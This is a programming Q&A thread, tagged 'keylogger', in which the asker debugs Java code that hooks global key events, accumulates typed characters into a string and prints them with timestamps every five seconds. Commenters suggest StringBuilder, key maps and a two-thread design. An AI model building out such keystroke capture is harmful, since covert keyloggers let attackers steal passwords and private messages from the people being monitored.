# Java add each value to a string

Tags: java, keylogger

I have a really big program that needs to check what character is typed this is just a part of the broken part. So it worked when I had it logging each character typed. But when I try to add each character to the string so when they type the word hi it looks like this:

```
hi
```

and NOT

```
h
i
```

No matter what i try it either gives me the first value typed and doesnt add each character to the string I also want it to print out the string every 5 seconds im not sure if I did that right either but it might be correct.

```
            String log = " ";
            if(event.getVirtualKeyCode() == GlobalKeyEvent.VK_SPACE){
                log = log + "";
            }

            if(event.getVirtualKeyCode() == GlobalKeyEvent.VK_BACK){
                log = log + "[BACKSPACE]";
            }

            String timestamp = new SimpleDateFormat("yyyy:MM:dd HH:mm:ss").format(Calendar.getInstance().getTime());
            while(true){
                try {
                    Thread.sleep(5000);
                    System.out.println("[" + timestamp + "]" + log);
                } catch(InterruptedException ex) {
                    Thread.currentThread().interrupt();
                }
            }
```

Comment: where are you adding these characters?

Comment: log = log + " "; and log = log + "[BACKSPACE]";

Comment: Assume , log = "M"
when you run this line: log=log+"" => log="M"+"", which is  log = "M", how are characters coming into log?

Comment: `log = log + ""` is a waste. Also, you're printing after each character (according to your code). So, if that's not what you're wanting the don't `println`.

Comment: when you press a key i got like 50 other if statements for each character.

Comment: Well, that should probably be a `switch` but, beyond that, you should do your concatenations separate from the logging if you want it to be time, and not *key stroke*, based.

Comment: also theres a typo in the code its log = log + " " not ""

Comment: Ideally, you should use a `StringBuilder`. I would also suggest a HashMap from your keycodes to the strings you want to use

Comment: i tried stringbuilder before and it did same thing where it doesnt add the strings together after each type.

Comment: You need two threads. One that adds strings to a builder, and the other that waits 5 seconds before clearing that builder and printing the log

Answer (score -1):

Try to declare a new string:

```
String log = new String(" ");
```